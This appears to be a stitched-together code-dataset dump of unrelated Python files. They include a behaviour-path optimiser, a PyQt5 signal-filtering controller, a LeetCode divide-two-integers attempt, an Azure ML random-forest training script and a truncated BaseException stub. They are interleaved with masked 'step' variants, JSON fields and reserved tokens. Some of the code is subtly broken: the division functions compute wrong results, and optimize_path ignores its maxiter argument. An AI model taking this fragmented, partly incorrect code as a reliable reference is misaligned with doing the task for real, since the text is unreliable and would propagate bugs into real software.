for i in xrange(self.max_iter):\n B = self.deflate ** (i + 1)\n r = self.stepsize * B\n u = np.random.uniform(-r, r, x.shape)\n if self.bounds.is_valid(x + u):\n x += u\n return x\n return x\n\n\ndef optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):\n '''Erlang Entry Point to Optimization Module'''\n B_table = parse_behaviours(behaviours)\n BTG = parse_edgelist(btg)\n F = parse_prediction(prediction)\n\n path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=10)\n return list(path), map(lambda x: int(x) + start, t.x)\n\n\ndef best_path(paths, Behaviour_Table, BTG, F, dt=1.,\n maxiter=20, Acc0=None, method=\"SLSQP\"):\n '''\n Perform the mixed ILP optimization (without queues, or memory), that yields\n the optimal behaviour transition through the BTG.\n\n :paths -> iterable of path-iterables, path-domain for optimization\n Each path-iterable contains only behaviour_id.\n :Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}\n Must contain all behaviours in btg\n :btg -> Behaviour Transition Graph, nodes are behaviour_ids,\n dictionary of the form {(v_1, v_2): tau_1,2}\n :F -> Prediction matrix, of shape (|b_vec|, n),\n where n is int(T_max/dt)\n :dt -> Prediction time-resolution\n :Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.\n '''\n # Given a particular path, find the optimal times to transition\n Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0\n\n Solutions = []\n t_max = int((F.shape[-1] - 1) * dt)\n initial_T = F.sum() / len(paths[0])\n for path in paths:\n L, x0, bounds, step_taker = opt_params(path, Behaviour_Table,\n BTG, t_max, F, dt=dt, Acc0=Acc0)\n\n minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds(),\n 'constraints': bounds.SLSQP_constraints()[method.lower()],\n }\n result = basinhopping(L, x0.copy(),\n accept_test=bounds,\n take_step=step_taker, stepsize=10*dt,\n niter=maxiter, T=initial_T,\n interval=20,\n minimizer_kwargs=minimizer_kwargs)\n 
Solutions.append(result)\n\n i, BestPath = min(((i, s) for i, s in enumerate(Solutions)),\n key=lambda x: x[1].fun)\n return paths[i], BestPath\n\n\ndef opt_params(path, BTable, BTG, t_max, F, dt, Acc0,\n q_acc_model=qsim.integrator, q_acc_model_args=[], q_model_kwargs={},\n q_relief_model=qsim.linear_relief,\n deadtime_penalty=4):\n '''Generates the components necessary to completely specify\n best-path optimization routine. (With a queue model)\n\n Returns:\n :Lagrangian Objective Function L(x) -> Contains a Barrier Component\n :x0 -> an initial realizeable solution\n :bounds -> a Bounds() object, that defines surrounding hyper-volume for x\n '''\n B = np.vstack(BTable[bid] for bid in path) # Behaviour Matrix (d,4)\n taus = transition_costs(path, BTG)\n x0 = initial_soln(path, t_max)\n bounds = Bounds(0., (F.shape[-1] - 1) * dt, taus)\n\n def cost(x, p=deadtime_penalty):\n '''Simulate the queue effects, and then evaluate the objective function\n on the simulation result'''\n k = F.shape[1] if F.shape[1] > 0 else 1\n avg_rates = F.sum(1) / k\n Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=BTable,\n Acc0=Acc0, relief_mode_kwargs={\"rate\": 0.5})\n cum_Z = np.cumsum(Z, axis=1)\n\n Deadtimes = np.where(Z == 0, 0, 1).sum(1)\n\n return (-obj(x, B, cum_Z, taus, dt=dt)\n + 0.25* avg_rates.dot(Deadtimes) ** 2\n - avg_rates.sum()*Acc.sum()) # ????\n\n\n step_taker = Stepper(bounds, 10, 20)\n return cost, x0, bounds, step_taker\n\n\n# Parsers ###############################################################\ndef parse_edgelist(edges):\n '''[((a, b), tau)] -> {(a, b): tau}'''\n return {(a, b): tau for (a, b), tau in edges}\n\ndef parse_behaviours(behaviours, dtype=np.float32):\n '''[(bid, [bvec])] -> {bid: <bvec>}'''\n return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}\n\ndef parse_prediction(F):\n '''[[float]] -> np.array(...) 
of same shape'''\n return np.array(F) # Might not work, will check back later\n\n\n# Optimization ###############################################################\ndef initial_soln(path, t_max):\n '''Evenly Distributed, no check for taus'''\n j = t_max / len(path)\n return np.array([(i + 1) * j for i in xrange(len(path) - 1)])\n\ndef transition_costs(path, btg):\n '''Sequence of transition costs associated with the prescribed path'''\n return [btg[(path[i], path[i+1])] for i in xrange(len(path) - 1)]\n\ndef range_sum(cum_F, a, b, penalty=-1000):\n '''Penalty brutally dominates any out-of-index operation...'''\n z = cum_F.shape[-1] - 1\n if (not 0 <= a <= z) or (not 0 <= b <= z):\n return np.ones(cum_F.shape[0]) * penalty\n return cum_F[..., b] - cum_F[..., a]\n\ndef flow_served(cum_F, times, costs, queue_model=None, dt=1.):\n '''Times: [t1, ..., td],\n costs: [t_{b0, b1}, t_{b1, b2}, ...]\n Returns the Fulfillment matrix associated with each behaviour segment.'''\n discr_index = lambda x: int(x / dt) - 1\n t_steps = [0] + map(discr_index, times)\n t_steps.append(cum_F.shape[-1] - 1) # t_max\n\n c_steps = [0] + map(discr_index, costs)\n\n result = np.vstack([range_sum(cum_F, t_steps[i] + c_steps[i], t_steps[i + 1])\n for i in xrange(len(costs) + 1)])\n return result\n\ndef obj(times, B, cum_F, costs, dt=1.):\n '''Objective Function for Hillclimbing'''\n Z = B * flow_served(cum_F, times, costs, dt=dt)\n return Z.sum()\n\ndef barrier(times, path, BTG):\n '''Handles Linear/causality Constraints with respect to transitions'''\n t = [0] + list(times)\n S = 0.\n for i in xrange(len(path) - 1):\n edge = (path[i], path[i + 1])\n tau = BTG[edge]\n S += min(0, (t[i + 1] - t[i] - tau)) # Only accrue if constraint is voilated\n return S\n",
"step-ids": [
16,
17,
22,
23,
24
]
}
|
[
16,
17,
22,
23,
24
] |
<|reserved_special_token_0|>
class Controlador(object):
def __init__(self, vista, modelo, vista2):
self._mi_vista = vista
self._mi_modelo = modelo
self._mi2_ventana = vista2
def recibirruta(self, r):
self._mi_modelo.recibirruta(r)
def recibirtipodearchivo(self, tipefile):
self._mi_modelo.recibirtipodearchivo(tipefile)
def loadsignals(self, l):
mini, maxi = self._mi_modelo.loadsignals(l)
return mini, maxi
def graph(self, ch, m, mx):
senal = self._mi_modelo.graph(ch, m, mx)
return senal
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def esposible(self):
return self._mi_modelo.possiblesave
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Controlador(object):
def __init__(self, vista, modelo, vista2):
self._mi_vista = vista
self._mi_modelo = modelo
self._mi2_ventana = vista2
def recibirruta(self, r):
self._mi_modelo.recibirruta(r)
def recibirtipodearchivo(self, tipefile):
self._mi_modelo.recibirtipodearchivo(tipefile)
def loadsignals(self, l):
mini, maxi = self._mi_modelo.loadsignals(l)
return mini, maxi
def graph(self, ch, m, mx):
senal = self._mi_modelo.graph(ch, m, mx)
return senal
def filtrar(self, ch, tr, tw, tt):
senal, senalfiltrada = self._mi_modelo.filtrar(ch, tr, tw, tt)
return senal, senalfiltrada
<|reserved_special_token_0|>
def esposible(self):
return self._mi_modelo.possiblesave
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Controlador(object):
def __init__(self, vista, modelo, vista2):
self._mi_vista = vista
self._mi_modelo = modelo
self._mi2_ventana = vista2
def recibirruta(self, r):
self._mi_modelo.recibirruta(r)
def recibirtipodearchivo(self, tipefile):
self._mi_modelo.recibirtipodearchivo(tipefile)
def loadsignals(self, l):
mini, maxi = self._mi_modelo.loadsignals(l)
return mini, maxi
def graph(self, ch, m, mx):
senal = self._mi_modelo.graph(ch, m, mx)
return senal
def filtrar(self, ch, tr, tw, tt):
senal, senalfiltrada = self._mi_modelo.filtrar(ch, tr, tw, tt)
return senal, senalfiltrada
def guardarfil(self, ch, archivo):
self._mi_modelo.guardarfil(ch, archivo)
def esposible(self):
return self._mi_modelo.possiblesave
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Controlador(object):
def __init__(self, vista, modelo, vista2):
self._mi_vista = vista
self._mi_modelo = modelo
self._mi2_ventana = vista2
def recibirruta(self, r):
self._mi_modelo.recibirruta(r)
def recibirtipodearchivo(self, tipefile):
self._mi_modelo.recibirtipodearchivo(tipefile)
def loadsignals(self, l):
mini, maxi = self._mi_modelo.loadsignals(l)
return mini, maxi
def graph(self, ch, m, mx):
senal = self._mi_modelo.graph(ch, m, mx)
return senal
def filtrar(self, ch, tr, tw, tt):
senal, senalfiltrada = self._mi_modelo.filtrar(ch, tr, tw, tt)
return senal, senalfiltrada
def guardarfil(self, ch, archivo):
self._mi_modelo.guardarfil(ch, archivo)
def esposible(self):
return self._mi_modelo.possiblesave
if __name__ == '__main__':
app = QApplication(sys.argv)
mi_vista = Ventanainicio()
mi_modelo = ventanadentrada()
mi_2vista = dosventana()
mi_controlador = Controlador(mi_vista, mi_modelo, mi_2vista)
mi_vista.asignarcontrolador(mi_controlador)
mi_vista.show()
app.exec_()
if mi_modelo.changepage == 1:
mi_2vista.asignarcontrolador(mi_controlador)
mi_2vista.show()
sys.exit(app.exec_())
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
"""
Created on Sat Mar 21 09:46:47 2020
@author: Carlos Jose Munoz
"""
# se importa el modelo y vista para que sesten comunicados por medio del controlador
from Modelo import ventanadentrada
from Vista import Ventanainicio,dosventana
import sys
from PyQt5.QtWidgets import QApplication
class Controlador(object): #objeto que va a recibir los comandos de la interfaz para enviarselos al modelo y desarrollar la accion necesaria
def __init__(self, vista,modelo,vista2):
self._mi_vista=vista #atributo para la apertura de la primera ventana
self._mi_modelo= modelo #apertura del modelo
self._mi2_ventana=vista2 #apertura de la segunda ventana
def recibirruta(self, r): #recibe la ruta del archivo y se la pasa al modelo
self._mi_modelo.recibirruta(r)
def recibirtipodearchivo(self, tipefile): #recibe el tipo de archivo para poder hacer el cambio de ventana
self._mi_modelo.recibirtipodearchivo(tipefile)
def loadsignals(self,l):#devuelve los valores iniciales de tiempo segun el tipo de señal
mini, maxi=self._mi_modelo.loadsignals(l)
return mini, maxi
def graph(self,ch,m,mx): #retorna la señal (todos o un solo canal) y los valores de tiempo que se vana graficar
senal= self._mi_modelo.graph(ch,m,mx)
return senal
def filtrar(self,ch,tr,tw,tt): #retorna la señal (canal) original y la señal filtrada que devuelve el modelo dependiendo del tipo del filtro
senal, senalfiltrada= self._mi_modelo.filtrar(ch,tr,tw,tt)
return senal, senalfiltrada
def guardarfil(self,ch,archivo): #recibe la ruta, nombre de archivo y canal para guardar la señal filtrada
self._mi_modelo.guardarfil(ch,archivo)
def esposible(self): #habilita el botón de guardar señal filtrada
return self._mi_modelo.possiblesave
if __name__ == '__main__': #inicio del programa, es el programa principal que se corre
app=QApplication(sys.argv)
mi_vista=Ventanainicio(); #objeto asociado a la ventana inicial
mi_modelo=ventanadentrada();# objeto asociado al modelo
mi_2vista=dosventana(); #objeto asociado a la ventana de visualizacion
mi_controlador= Controlador(mi_vista,mi_modelo,mi_2vista)# objeto que enlaza las ventanas con los modelos
#asignarle el controlador a la vista
mi_vista.asignarcontrolador(mi_controlador) #se usa para realizar el enlace entre la vista y el controlador
mi_vista.show() #genera la ventana inicial
app.exec_();
if (mi_modelo.changepage==1): #si es posible pasar a la segunda ventana se genera la ventana secundaria
mi_2vista.asignarcontrolador(mi_controlador)
mi_2vista.show();
sys.exit(app.exec_());
|
flexible
|
{
"blob_id": "3329db63552592aabb751348efc5d983f2cc3f36",
"index": 1828,
"step-1": "<mask token>\n\n\nclass Controlador(object):\n\n def __init__(self, vista, modelo, vista2):\n self._mi_vista = vista\n self._mi_modelo = modelo\n self._mi2_ventana = vista2\n\n def recibirruta(self, r):\n self._mi_modelo.recibirruta(r)\n\n def recibirtipodearchivo(self, tipefile):\n self._mi_modelo.recibirtipodearchivo(tipefile)\n\n def loadsignals(self, l):\n mini, maxi = self._mi_modelo.loadsignals(l)\n return mini, maxi\n\n def graph(self, ch, m, mx):\n senal = self._mi_modelo.graph(ch, m, mx)\n return senal\n <mask token>\n <mask token>\n\n def esposible(self):\n return self._mi_modelo.possiblesave\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Controlador(object):\n\n def __init__(self, vista, modelo, vista2):\n self._mi_vista = vista\n self._mi_modelo = modelo\n self._mi2_ventana = vista2\n\n def recibirruta(self, r):\n self._mi_modelo.recibirruta(r)\n\n def recibirtipodearchivo(self, tipefile):\n self._mi_modelo.recibirtipodearchivo(tipefile)\n\n def loadsignals(self, l):\n mini, maxi = self._mi_modelo.loadsignals(l)\n return mini, maxi\n\n def graph(self, ch, m, mx):\n senal = self._mi_modelo.graph(ch, m, mx)\n return senal\n\n def filtrar(self, ch, tr, tw, tt):\n senal, senalfiltrada = self._mi_modelo.filtrar(ch, tr, tw, tt)\n return senal, senalfiltrada\n <mask token>\n\n def esposible(self):\n return self._mi_modelo.possiblesave\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Controlador(object):\n\n def __init__(self, vista, modelo, vista2):\n self._mi_vista = vista\n self._mi_modelo = modelo\n self._mi2_ventana = vista2\n\n def recibirruta(self, r):\n self._mi_modelo.recibirruta(r)\n\n def recibirtipodearchivo(self, tipefile):\n self._mi_modelo.recibirtipodearchivo(tipefile)\n\n def loadsignals(self, l):\n mini, maxi = self._mi_modelo.loadsignals(l)\n return mini, maxi\n\n def graph(self, ch, m, mx):\n senal = self._mi_modelo.graph(ch, m, mx)\n return senal\n\n def filtrar(self, ch, tr, tw, tt):\n senal, senalfiltrada = self._mi_modelo.filtrar(ch, tr, tw, tt)\n return senal, senalfiltrada\n\n def guardarfil(self, ch, archivo):\n self._mi_modelo.guardarfil(ch, archivo)\n\n def esposible(self):\n return self._mi_modelo.possiblesave\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Controlador(object):\n\n def __init__(self, vista, modelo, vista2):\n self._mi_vista = vista\n self._mi_modelo = modelo\n self._mi2_ventana = vista2\n\n def recibirruta(self, r):\n self._mi_modelo.recibirruta(r)\n\n def recibirtipodearchivo(self, tipefile):\n self._mi_modelo.recibirtipodearchivo(tipefile)\n\n def loadsignals(self, l):\n mini, maxi = self._mi_modelo.loadsignals(l)\n return mini, maxi\n\n def graph(self, ch, m, mx):\n senal = self._mi_modelo.graph(ch, m, mx)\n return senal\n\n def filtrar(self, ch, tr, tw, tt):\n senal, senalfiltrada = self._mi_modelo.filtrar(ch, tr, tw, tt)\n return senal, senalfiltrada\n\n def guardarfil(self, ch, archivo):\n self._mi_modelo.guardarfil(ch, archivo)\n\n def esposible(self):\n return self._mi_modelo.possiblesave\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n mi_vista = Ventanainicio()\n mi_modelo = ventanadentrada()\n mi_2vista = dosventana()\n mi_controlador = Controlador(mi_vista, mi_modelo, mi_2vista)\n mi_vista.asignarcontrolador(mi_controlador)\n mi_vista.show()\n app.exec_()\n if mi_modelo.changepage == 1:\n mi_2vista.asignarcontrolador(mi_controlador)\n mi_2vista.show()\n sys.exit(app.exec_())\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 21 09:46:47 2020\n\n@author: Carlos Jose Munoz\n\"\"\"\n# se importa el modelo y vista para que sesten comunicados por medio del controlador \nfrom Modelo import ventanadentrada\nfrom Vista import Ventanainicio,dosventana\n\nimport sys\n\nfrom PyQt5.QtWidgets import QApplication \n\nclass Controlador(object): #objeto que va a recibir los comandos de la interfaz para enviarselos al modelo y desarrollar la accion necesaria \n def __init__(self, vista,modelo,vista2): \n self._mi_vista=vista #atributo para la apertura de la primera ventana \n self._mi_modelo= modelo #apertura del modelo \n self._mi2_ventana=vista2 #apertura de la segunda ventana \n \n def recibirruta(self, r): #recibe la ruta del archivo y se la pasa al modelo \n self._mi_modelo.recibirruta(r)\n \n def recibirtipodearchivo(self, tipefile): #recibe el tipo de archivo para poder hacer el cambio de ventana\n self._mi_modelo.recibirtipodearchivo(tipefile)\n \n \n def loadsignals(self,l):#devuelve los valores iniciales de tiempo segun el tipo de señal \n mini, maxi=self._mi_modelo.loadsignals(l)\n return mini, maxi\n \n def graph(self,ch,m,mx): #retorna la señal (todos o un solo canal) y los valores de tiempo que se vana graficar \n senal= self._mi_modelo.graph(ch,m,mx)\n return senal\n \n def filtrar(self,ch,tr,tw,tt): #retorna la señal (canal) original y la señal filtrada que devuelve el modelo dependiendo del tipo del filtro \n senal, senalfiltrada= self._mi_modelo.filtrar(ch,tr,tw,tt)\n return senal, senalfiltrada\n \n def guardarfil(self,ch,archivo): #recibe la ruta, nombre de archivo y canal para guardar la señal filtrada \n self._mi_modelo.guardarfil(ch,archivo)\n \n def esposible(self): #habilita el botón de guardar señal filtrada \n return self._mi_modelo.possiblesave\n \nif __name__ == '__main__': #inicio del programa, es el programa principal que se corre \n app=QApplication(sys.argv)\n mi_vista=Ventanainicio(); #objeto asociado a la 
ventana inicial \n mi_modelo=ventanadentrada();# objeto asociado al modelo \n mi_2vista=dosventana(); #objeto asociado a la ventana de visualizacion \n mi_controlador= Controlador(mi_vista,mi_modelo,mi_2vista)# objeto que enlaza las ventanas con los modelos \n \n #asignarle el controlador a la vista\n mi_vista.asignarcontrolador(mi_controlador) #se usa para realizar el enlace entre la vista y el controlador \n \n mi_vista.show() #genera la ventana inicial \n \n \n app.exec_();\n if (mi_modelo.changepage==1): #si es posible pasar a la segunda ventana se genera la ventana secundaria \n \n mi_2vista.asignarcontrolador(mi_controlador)\n \n mi_2vista.show();\n sys.exit(app.exec_());\n\n\n \n",
"step-ids": [
7,
8,
9,
10,
12
]
}
|
[
7,
8,
9,
10,
12
] |
'''
给定两个整数,被除数 dividend 和除数 divisor。将两数相除,要求不使用乘法、除法和 mod 运算符。
返回被除数 dividend 除以除数 divisor 得到的商
链接:https://leetcode-cn.com/problems/divide-two-integers
'''
# 该题看起来也不难,但是其中坑很多,想要写出健壮的代码并不容易
# 我个人思考可以考虑使用上下界,不断缩小范围来确定
def division(dividend, divisor):
temp = 0
for i in range(dividend + 1):
temp += abs(divisor)
if temp > abs(dividend):
if ((dividend ^ divisor) >> divisor.__sizeof__())^1 > 0:
return i
else :
return -i
return 2**31 - 1
def division_v2(dividend, divisor):
def get_add_num(num, times):
sum = 0
for i in range(times):
sum += num
return sum
low = 0
up = dividend
while low < up:
mid = round((low + up) / 2)
if get_add_num(divisor, mid) < dividend:
low = mid
else:
up = mid
return mid
if __name__ == '__main__':
# print(division(2147483647, 1))
print(division_v2(3, 1))
|
normal
|
{
"blob_id": "edb80652de641a1a6cbb37a60cc236cd7828a96e",
"index": 8151,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef division_v2(dividend, divisor):\n\n def get_add_num(num, times):\n sum = 0\n for i in range(times):\n sum += num\n return sum\n low = 0\n up = dividend\n while low < up:\n mid = round((low + up) / 2)\n if get_add_num(divisor, mid) < dividend:\n low = mid\n else:\n up = mid\n return mid\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef division(dividend, divisor):\n temp = 0\n for i in range(dividend + 1):\n temp += abs(divisor)\n if temp > abs(dividend):\n if (dividend ^ divisor) >> divisor.__sizeof__() ^ 1 > 0:\n return i\n else:\n return -i\n return 2 ** 31 - 1\n\n\ndef division_v2(dividend, divisor):\n\n def get_add_num(num, times):\n sum = 0\n for i in range(times):\n sum += num\n return sum\n low = 0\n up = dividend\n while low < up:\n mid = round((low + up) / 2)\n if get_add_num(divisor, mid) < dividend:\n low = mid\n else:\n up = mid\n return mid\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef division(dividend, divisor):\n temp = 0\n for i in range(dividend + 1):\n temp += abs(divisor)\n if temp > abs(dividend):\n if (dividend ^ divisor) >> divisor.__sizeof__() ^ 1 > 0:\n return i\n else:\n return -i\n return 2 ** 31 - 1\n\n\ndef division_v2(dividend, divisor):\n\n def get_add_num(num, times):\n sum = 0\n for i in range(times):\n sum += num\n return sum\n low = 0\n up = dividend\n while low < up:\n mid = round((low + up) / 2)\n if get_add_num(divisor, mid) < dividend:\n low = mid\n else:\n up = mid\n return mid\n\n\nif __name__ == '__main__':\n print(division_v2(3, 1))\n",
"step-5": "\n'''\n给定两个整数,被除数 dividend 和除数 divisor。将两数相除,要求不使用乘法、除法和 mod 运算符。\n\n返回被除数 dividend 除以除数 divisor 得到的商\n\n链接:https://leetcode-cn.com/problems/divide-two-integers\n'''\n\n# 该题看起来也不难,但是其中坑很多,想要写出健壮的代码并不容易\n# 我个人思考可以考虑使用上下界,不断缩小范围来确定\ndef division(dividend, divisor):\n temp = 0\n for i in range(dividend + 1):\n temp += abs(divisor)\n if temp > abs(dividend):\n if ((dividend ^ divisor) >> divisor.__sizeof__())^1 > 0:\n return i\n else :\n return -i\n return 2**31 - 1\n\n\ndef division_v2(dividend, divisor):\n def get_add_num(num, times):\n sum = 0\n for i in range(times):\n sum += num\n return sum\n low = 0\n up = dividend\n while low < up:\n mid = round((low + up) / 2)\n if get_add_num(divisor, mid) < dividend:\n low = mid\n else:\n up = mid\n return mid\n\n\nif __name__ == '__main__':\n # print(division(2147483647, 1))\n print(division_v2(3, 1))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
parser.add_argument('--in_n_estimator', type=int, default=8)
parser.add_argument('--in_criterion', type=str, default='gini')
parser.add_argument('--in_max_depth', type=int, default=2)
<|reserved_special_token_0|>
model.fit(x_train, y_train)
<|reserved_special_token_0|>
run.log('Accuracy', float(accuracy))
os.makedirs('outputs', exist_ok=True)
joblib.dump(model, 'outputs/model_forest.joblib')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
run = Run.get_context()
parser = argparse.ArgumentParser()
parser.add_argument('--in_n_estimator', type=int, default=8)
parser.add_argument('--in_criterion', type=str, default='gini')
parser.add_argument('--in_max_depth', type=int, default=2)
args = parser.parse_args()
in_n_estimators = args.in_n_estimator
in_criterion = args.in_criterion
in_max_depth = args.in_max_depth
df = pd.read_csv('prepared_data.csv')
columns = df.iloc[1:2, :-1].columns
x = df[columns]
y = df.iloc[:, -1:]
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.25,
random_state=2)
model = RandomForestClassifier(n_estimators=in_n_estimators, criterion=
in_criterion, max_depth=in_max_depth)
model.fit(x_train, y_train)
accuracy = model.score(x_test, y_test)
run.log('Accuracy', float(accuracy))
os.makedirs('outputs', exist_ok=True)
joblib.dump(model, 'outputs/model_forest.joblib')
<|reserved_special_token_1|>
from sklearn.model_selection import train_test_split
from azureml.core import Run
from sklearn.ensemble import RandomForestClassifier
import pandas as pd
import argparse
import os
import joblib
import numpy as np
run = Run.get_context()
parser = argparse.ArgumentParser()
parser.add_argument('--in_n_estimator', type=int, default=8)
parser.add_argument('--in_criterion', type=str, default='gini')
parser.add_argument('--in_max_depth', type=int, default=2)
args = parser.parse_args()
in_n_estimators = args.in_n_estimator
in_criterion = args.in_criterion
in_max_depth = args.in_max_depth
df = pd.read_csv('prepared_data.csv')
columns = df.iloc[1:2, :-1].columns
x = df[columns]
y = df.iloc[:, -1:]
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.25,
random_state=2)
model = RandomForestClassifier(n_estimators=in_n_estimators, criterion=
in_criterion, max_depth=in_max_depth)
model.fit(x_train, y_train)
accuracy = model.score(x_test, y_test)
run.log('Accuracy', float(accuracy))
os.makedirs('outputs', exist_ok=True)
joblib.dump(model, 'outputs/model_forest.joblib')
<|reserved_special_token_1|>
from sklearn.model_selection import train_test_split
from azureml.core import Run
from sklearn.ensemble import RandomForestClassifier
import pandas as pd
import argparse
import os
import joblib
import numpy as np
# Get the experiment run context
run = Run.get_context()
# Get arguments
parser = argparse.ArgumentParser()
parser.add_argument('--in_n_estimator', type=int, default=8)
parser.add_argument('--in_criterion', type=str, default="gini")
parser.add_argument('--in_max_depth', type=int, default=2)
args = parser.parse_args()
in_n_estimators = args.in_n_estimator
in_criterion = args.in_criterion
in_max_depth = args.in_max_depth
# read prepared data
df = pd.read_csv("prepared_data.csv")
columns = df.iloc[1:2, :-1].columns
x = df[columns]
y = df.iloc[:, -1:]
# split data into train and test
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.25, random_state=2)
# “gini”, “entropy”
model = RandomForestClassifier(n_estimators=in_n_estimators, criterion=in_criterion, max_depth=in_max_depth)
model.fit(x_train, y_train)
accuracy = model.score(x_test, y_test)
run.log("Accuracy", float(accuracy))
os.makedirs('outputs', exist_ok=True)
joblib.dump(model, 'outputs/model_forest.joblib')
|
flexible
|
{
"blob_id": "66c2d73c100f7fc802e66f2762c92664e4b93fcd",
"index": 5736,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nparser.add_argument('--in_n_estimator', type=int, default=8)\nparser.add_argument('--in_criterion', type=str, default='gini')\nparser.add_argument('--in_max_depth', type=int, default=2)\n<mask token>\nmodel.fit(x_train, y_train)\n<mask token>\nrun.log('Accuracy', float(accuracy))\nos.makedirs('outputs', exist_ok=True)\njoblib.dump(model, 'outputs/model_forest.joblib')\n",
"step-3": "<mask token>\nrun = Run.get_context()\nparser = argparse.ArgumentParser()\nparser.add_argument('--in_n_estimator', type=int, default=8)\nparser.add_argument('--in_criterion', type=str, default='gini')\nparser.add_argument('--in_max_depth', type=int, default=2)\nargs = parser.parse_args()\nin_n_estimators = args.in_n_estimator\nin_criterion = args.in_criterion\nin_max_depth = args.in_max_depth\ndf = pd.read_csv('prepared_data.csv')\ncolumns = df.iloc[1:2, :-1].columns\nx = df[columns]\ny = df.iloc[:, -1:]\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.25,\n random_state=2)\nmodel = RandomForestClassifier(n_estimators=in_n_estimators, criterion=\n in_criterion, max_depth=in_max_depth)\nmodel.fit(x_train, y_train)\naccuracy = model.score(x_test, y_test)\nrun.log('Accuracy', float(accuracy))\nos.makedirs('outputs', exist_ok=True)\njoblib.dump(model, 'outputs/model_forest.joblib')\n",
"step-4": "from sklearn.model_selection import train_test_split\nfrom azureml.core import Run\nfrom sklearn.ensemble import RandomForestClassifier\nimport pandas as pd\nimport argparse\nimport os\nimport joblib\nimport numpy as np\nrun = Run.get_context()\nparser = argparse.ArgumentParser()\nparser.add_argument('--in_n_estimator', type=int, default=8)\nparser.add_argument('--in_criterion', type=str, default='gini')\nparser.add_argument('--in_max_depth', type=int, default=2)\nargs = parser.parse_args()\nin_n_estimators = args.in_n_estimator\nin_criterion = args.in_criterion\nin_max_depth = args.in_max_depth\ndf = pd.read_csv('prepared_data.csv')\ncolumns = df.iloc[1:2, :-1].columns\nx = df[columns]\ny = df.iloc[:, -1:]\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.25,\n random_state=2)\nmodel = RandomForestClassifier(n_estimators=in_n_estimators, criterion=\n in_criterion, max_depth=in_max_depth)\nmodel.fit(x_train, y_train)\naccuracy = model.score(x_test, y_test)\nrun.log('Accuracy', float(accuracy))\nos.makedirs('outputs', exist_ok=True)\njoblib.dump(model, 'outputs/model_forest.joblib')\n",
"step-5": "from sklearn.model_selection import train_test_split\nfrom azureml.core import Run\nfrom sklearn.ensemble import RandomForestClassifier\nimport pandas as pd\nimport argparse\nimport os\nimport joblib\nimport numpy as np\n\n\n# Get the experiment run context\nrun = Run.get_context()\n\n# Get arguments\nparser = argparse.ArgumentParser()\nparser.add_argument('--in_n_estimator', type=int, default=8)\nparser.add_argument('--in_criterion', type=str, default=\"gini\")\nparser.add_argument('--in_max_depth', type=int, default=2)\n\nargs = parser.parse_args()\nin_n_estimators = args.in_n_estimator\nin_criterion = args.in_criterion\nin_max_depth = args.in_max_depth\n\n\n# read prepared data\ndf = pd.read_csv(\"prepared_data.csv\")\ncolumns = df.iloc[1:2, :-1].columns\nx = df[columns]\ny = df.iloc[:, -1:]\n\n# split data into train and test\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.25, random_state=2)\n\n# “gini”, “entropy”\nmodel = RandomForestClassifier(n_estimators=in_n_estimators, criterion=in_criterion, max_depth=in_max_depth)\n\nmodel.fit(x_train, y_train)\n\naccuracy = model.score(x_test, y_test)\nrun.log(\"Accuracy\", float(accuracy))\n\nos.makedirs('outputs', exist_ok=True)\njoblib.dump(model, 'outputs/model_forest.joblib')\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
class BaseException(object):
<|reserved_special_token_0|>
def with_traceback(self, tb):
"""
Exception.with_traceback(tb) --
set self.__traceback__ to tb and return self.
"""
pass
def __delattr__(self, *args, **kwargs):
""" Implement delattr(self, name). """
pass
def __getattribute__(self, *args, **kwargs):
""" Return getattr(self, name). """
pass
def __init__(self, *args, **kwargs):
pass
@staticmethod
def __new__(*args, **kwargs):
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __reduce__(self, *args, **kwargs):
pass
<|reserved_special_token_0|>
def __setattr__(self, *args, **kwargs):
""" Implement setattr(self, name, value). """
pass
<|reserved_special_token_0|>
def __str__(self, *args, **kwargs):
""" Return str(self). """
pass
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class BaseException(object):
<|reserved_special_token_0|>
def with_traceback(self, tb):
"""
Exception.with_traceback(tb) --
set self.__traceback__ to tb and return self.
"""
pass
def __delattr__(self, *args, **kwargs):
""" Implement delattr(self, name). """
pass
def __getattribute__(self, *args, **kwargs):
""" Return getattr(self, name). """
pass
def __init__(self, *args, **kwargs):
pass
@staticmethod
def __new__(*args, **kwargs):
